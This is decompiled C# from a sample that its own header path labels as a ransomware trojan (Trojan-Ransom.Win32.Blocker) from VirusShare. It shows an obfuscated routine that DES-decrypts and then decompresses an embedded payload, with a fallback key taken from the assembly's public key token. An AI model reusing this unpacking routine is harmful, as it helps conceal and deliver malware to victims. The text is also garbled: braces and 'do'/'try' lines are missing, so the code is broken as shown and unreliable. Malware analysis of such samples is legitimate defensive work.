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// Decompiled with JetBrains decompiler
// Type: A.c723bfb08ed492f620d3f103aea9340c0
// Assembly: Sharl, Version=, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;
namespace A
internal class c723bfb08ed492f620d3f103aea9340c0
internal static byte[] c62aa9377688ed67bcfc8a790818c7647(
Stream c46bc97527d5b5ecfa7a6ae35f370bef0)
byte num1 = (byte) c46bc97527d5b5ecfa7a6ae35f370bef0.ReadByte();
byte[] numArray = new byte[c46bc97527d5b5ecfa7a6ae35f370bef0.Length - 1L];
c46bc97527d5b5ecfa7a6ae35f370bef0.Read(numArray, 0, numArray.Length);
if (((int) num1 & 1) != 0)
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
byte[] dst1 = new byte[8];
Buffer.BlockCopy((Array) numArray, 0, (Array) dst1, 0, 8);
cryptoServiceProvider.IV = dst1;
byte[] dst2 = new byte[8];
Buffer.BlockCopy((Array) numArray, 8, (Array) dst2, 0, 8);
bool flag = true;
foreach (byte num2 in dst2)
if (num2 != (byte) 0)
flag = false;
if (flag)
dst2 = Assembly.GetExecutingAssembly().GetName().GetPublicKeyToken();
cryptoServiceProvider.Key = dst2;
numArray = cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(numArray, 16, numArray.Length - 16);
if (((int) num1 & 2) != 0)
MemoryStream memoryStream1 = new MemoryStream(numArray);
DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress);
MemoryStream memoryStream2 = new MemoryStream((int) memoryStream1.Length * 2);
int count1 = 1000;
byte[] buffer = new byte[count1];
int count2;
count2 = deflateStream.Read(buffer, 0, count1);
if (count2 > 0)
memoryStream2.Write(buffer, 0, count2);
while (count2 >= count1);
numArray = memoryStream2.ToArray();
catch (Exception ex)
return numArray;